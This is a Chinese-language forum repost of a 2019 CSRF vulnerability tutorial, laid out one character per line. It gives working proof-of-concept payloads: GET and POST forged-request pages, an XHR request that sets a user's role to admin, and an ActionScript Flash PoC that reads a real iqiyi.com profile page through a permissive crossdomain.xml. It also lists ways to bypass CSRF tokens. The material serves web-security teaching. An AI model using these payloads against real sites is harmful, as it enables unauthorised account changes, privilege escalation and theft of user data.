论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[18784] 2019-06-07_CSRF漏洞总结
文档创建者:
s7ckTeam
浏览次数:
6
最后更新:
2025-01-18
漏洞
6 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2019-06-07_CSRF漏洞总结
C
S
R
F
漏
洞
总
结
c
r
h
u
a
h
u
a
s
e
c
2
0
1
9
-
0
6
-
0
7
“
端
午
安
康
,
e
v
e
r
y
o
n
e
”
0
1
—
漏
洞
点
1
、
修
改
个
人
资
料
、
邮
箱
、
密
码
、
头
像
2
、
关
注
用
户
3
、
发
表
文
章
4
、
添
加
、
删
除
评
论
5
、
添
加
、
修
改
、
删
除
收
货
地
址
6
、
添
加
管
理
员
0
2
—
漏
洞
挖
掘
(
1
)
G
E
T
型
G
E
T
类
型
的
C
S
R
F
利
用
非
常
简
单
,
只
需
要
一
个
H
T
T
P
请
求
,
所
以
,
一
般
会
这
样
利
用
:
(
2
)
P
O
S
T
型
P
O
S
T
请
求
中
没
有
t
o
k
e
n
参
数
,
然
后
请
求
也
没
有
验
证
r
e
f
e
r
e
r
信
息
。
这
种
是
存
在
C
S
R
F
情
况
最
多
的
一
种
。
这
种
漏
洞
的
检
测
方
法
也
很
简
单
,
网
页
操
作
某
功
能
,
抓
包
后
,
如
果
发
现
没
有
t
o
k
e
n
等
参
数
,
然
后
就
将
r
e
f
e
r
e
r
信
息
设
置
为
空
,
再
次
发
包
请
求
,
如
果
请
求
成
功
了
,
就
说
明
这
里
有
C
S
R
F
漏
洞
。
例
如
:
某
论
坛
主
页
刷
粉
丝
,
可
以
使
用
如
下
p
o
c
:
P
O
S
T
请
求
数
据
为
x
m
l
格
式
,
P
O
C
为
:
P
O
S
T
请
求
数
据
为
j
s
o
n
,
P
O
C
为
:
<
i
m
g
s
r
c
=
h
t
t
p
:
/
/
w
w
w
.
h
u
a
s
e
c
.
c
o
m
/
c
s
r
f
?
x
x
=
1
1
/
>
<
h
t
m
l
>
<
b
o
d
y
>
<
f
o
r
m
n
a
m
e
=
"
p
x
"
m
e
t
h
o
d
=
"
p
o
s
t
"
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
w
w
w
.
h
u
a
s
e
c
.
c
o
m
/
a
d
d
f
a
n
s
"
>
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
n
a
m
e
=
"
u
s
e
r
_
i
d
"
v
a
l
u
e
=
"
1
1
1
1
"
>
<
/
f
o
r
m
>
<
s
c
r
i
p
t
>
d
o
c
u
m
e
n
t
.
p
x
.
s
u
b
m
i
t
(
)
;
<
/
s
c
r
i
p
t
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
<
h
t
m
l
>
<
b
o
d
y
>
<
f
o
r
m
E
N
C
T
Y
P
E
=
"
t
e
x
t
/
p
l
a
i
n
"
a
c
t
i
o
n
=
"
h
t
t
p
:
/
/
w
w
w
.
h
u
a
s
e
c
.
c
o
m
/
s
n
i
p
p
e
t
.
p
h
p
"
m
e
t
h
o
d
=
"
p
o
s
t
"
>
<
i
n
p
u
t
t
y
p
e
=
"
h
i
d
d
e
n
"
n
a
m
e
=
"
p
a
r
a
m
"
v
a
l
u
e
=
"
<
f
o
o
>
<
h
t
m
l
x
m
l
n
s
h
t
m
l
=
'
h
t
t
p
:
/
/
w
w
w
.
w
3
.
o
r
g
/
1
9
9
9
/
x
h
t
m
l
'
>
<
h
t
m
l
:
s
c
r
i
p
t
>
a
l
e
r
t
(
1
)
;
<
/
h
t
m
l
:
s
c
r
i
p
t
>
<
/
h
t
m
l
>
<
/
f
o
o
>
"
>
<
i
n
p
u
t
t
y
p
e
=
"
s
u
b
m
i
t
"
n
a
m
e
=
"
s
u
b
m
i
t
"
>
<
/
f
o
r
m
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
<
s
c
r
i
p
t
>
v
a
r
x
h
r
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
x
h
r
.
o
p
e
n
(
"
P
O
S
T
"
,
"
h
t
t
p
:
/
/
w
w
w
.
h
u
a
s
e
c
.
c
o
m
/
a
p
i
/
s
e
t
r
o
l
e
"
)
;
x
h
r
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
x
h
r
.
s
e
t
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
T
y
p
e
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
;
c
h
a
r
s
e
t
=
U
T
F
-
8
"
)
;
x
h
r
.
s
e
n
d
(
'
{
"
r
o
l
e
"
:
a
d
m
i
n
}
'
)
;
<
/
s
c
r
i
p
t
>
(
3
)
F
l
a
s
h
型
F
l
a
s
h
C
S
R
F
通
常
是
由
于
C
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
配
置
不
当
造
成
的
,
利
用
方
法
是
使
用
s
w
f
来
发
起
跨
站
请
求
伪
造
。
利
用
条
件
:
1
、
目
标
站
点
下
必
须
存
在
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
。
2
、
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
中
的
配
置
允
许
其
他
域
进
行
跨
域
请
求
。
一
般
流
程
为
:
A
网
站
上
有
一
个
S
W
F
文
件
,
这
个
文
件
是
想
要
获
取
B
网
站
的
u
s
e
r
i
n
f
o
的
返
回
响
应
主
体
,
S
W
F
首
先
会
看
在
B
网
站
的
目
录
下
有
没
有
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
,
如
果
没
有
就
会
访
问
不
成
功
,
如
果
有
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
,
则
会
看
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
的
内
容
里
面
是
否
设
置
了
允
许
A
网
站
域
访
问
,
如
果
设
置
允
许
了
,
那
么
A
网
站
的
S
W
F
文
件
就
可
以
成
功
获
取
到
内
容
。
所
以
要
使
F
l
a
s
h
可
以
跨
域
传
输
数
据
,
其
关
键
就
是
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
。
案
例
案
例
1
某
网
站
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
内
容
如
下
:
在
这
里
我
需
要
做
两
件
事
:
1
.
找
到
一
个
能
获
取
敏
感
信
息
的
接
口
2
.
构
建
P
o
C
在
这
里
敏
感
的
信
息
接
口
以
个
人
中
心
为
例
子
,
P
o
C
使
用
的
是
案
例
案
例
2
奇
异
某
分
站
f
l
a
s
h
跨
域
漏
洞
,
看
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
。
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
<
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
<
a
l
l
o
w
-
a
c
c
e
s
s
-
f
r
o
m
d
o
m
a
i
n
=
"
*
"
/
>
<
/
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
h
t
t
p
s
:
/
/
g
i
t
h
u
b
.
c
o
m
/
n
c
c
g
r
o
u
p
/
C
r
o
s
s
S
i
t
e
C
o
n
t
e
n
t
H
i
j
a
c
k
i
n
g
/
r
a
w
/
m
a
s
t
e
r
/
C
o
n
t
e
n
t
H
i
j
a
c
k
i
n
g
/
o
b
j
e
c
t
s
/
C
o
n
t
e
n
t
H
i
j
a
c
k
i
n
g
.
s
w
f
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
个
人
首
页
u
r
l
:
h
t
t
p
:
/
/
i
.
i
q
i
y
i
.
c
o
m
/
h
o
m
e
?
l
e
f
t
t
i
t
l
e
s
i
g
n
=
p
e
r
c
e
n
t
e
r
获
取
用
户
用
户
个
人
首
页
信
息
,
P
O
C
为
:
0
3
—
B
y
p
a
s
s
1
.
删
除
c
s
r
f
t
o
k
e
n
2
.
置
空
c
s
r
f
t
o
k
e
n
3
.
修
改
请
求
方
法
,
如
P
O
S
T
方
法
变
G
E
T
请
求
4
.
使
用
与
t
o
k
e
n
相
同
长
度
的
任
意
字
符
串
替
换
t
o
k
e
n
,
例
如
尝
试
更
改
一
个
字
符
,
看
看
或
发
生
什
么
5
.
使
用
固
定
t
o
k
e
n
6
.
t
o
k
e
n
字
段
改
成
t
o
k
e
n
[
]
=
0
4
—
漏
洞
案
例
后
台
回
复
c
s
r
f
,
获
取
"
X
S
S
和
C
S
R
F
的
组
合
拳
进
攻
(
C
S
R
F
+
J
S
O
N
)
"
P
D
F
文
件
,
如
果
过
期
,
请
留
言
。
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
<
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
<
s
i
t
e
-
c
o
n
t
r
o
l
p
e
r
m
i
t
t
e
d
-
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
i
e
s
=
"
a
l
l
"
/
>
<
a
l
l
o
w
-
a
c
c
e
s
s
-
f
r
o
m
d
o
m
a
i
n
=
"
*
"
/
>
<
a
l
l
o
w
-
h
t
t
p
-
r
e
q
u
e
s
t
-
h
e
a
d
e
r
s
-
f
r
o
m
d
o
m
a
i
n
=
"
*
"
h
e
a
d
e
r
s
=
"
*
"
/
>
<
/
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
p
e
r
m
i
t
t
e
d
-
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
i
e
s
为
a
l
l
造
成
加
载
目
标
域
上
的
任
何
文
件
作
为
跨
域
策
略
文
件
,
甚
至
是
一
个
J
P
G
也
可
被
加
载
为
策
略
文
件
!
a
l
l
o
w
-
a
c
c
e
s
s
-
f
r
o
m
设
为
“
*
”
任
何
的
域
,
有
权
限
通
过
f
l
a
s
h
读
取
本
域
中
的
内
容
。
a
l
l
o
w
-
h
t
t
p
-
r
e
q
u
e
s
t
-
h
e
a
d
e
r
s
-
f
r
o
m
h
e
a
d
e
r
设
个
“
*
”
允
许
发
送
任
何
消
息
头
。
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
*
;
v
a
r
m
y
t
e
s
t
:
S
t
r
i
n
g
=
"
h
e
l
l
o
"
;
v
a
r
m
y
l
o
a
d
e
r
=
n
e
w
U
R
L
L
o
a
d
e
r
(
n
e
w
U
R
L
R
e
q
u
e
s
t
(
"
h
t
t
p
:
/
/
i
.
i
q
i
y
i
.
c
o
m
/
h
o
m
e
?
l
e
f
t
t
i
t
l
e
s
i
g
n
=
p
e
r
c
e
n
t
e
r
"
)
)
;
m
y
l
o
a
d
e
r
.
a
d
d
E
v
e
n
t
L
i
s
t
e
n
e
r
(
E
v
e
n
t
.
C
O
M
P
L
E
T
E
,
t
e
s
t
)
;
m
y
l
o
a
d
e
r
.
l
o
a
d
(
)
;
f
u
n
c
t
i
o
n
t
e
s
t
(
e
v
e
n
t
:
E
v
e
n
t
)
{
v
a
r
R
e
s
p
o
n
s
e
T
e
x
t
:
S
t
r
i
n
g
=
m
y
l
o
a
d
e
r
.
d
a
t
a
;
t
e
x
t
1
.
t
e
x
t
=
R
e
s
p
o
n
s
e
T
e
x
t
;
s
t
o
p
(
)
;
}
参
考
案
例
:
h
t
t
p
s
:
/
/
g
h
0
s
t
.
c
n
/
a
r
c
h
i
v
e
s
/
2
0
1
8
-
0
3
-
2
2
/
1
h
t
t
p
s
:
/
/
s
h
u
i
m
u
g
a
n
.
c
o
m
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞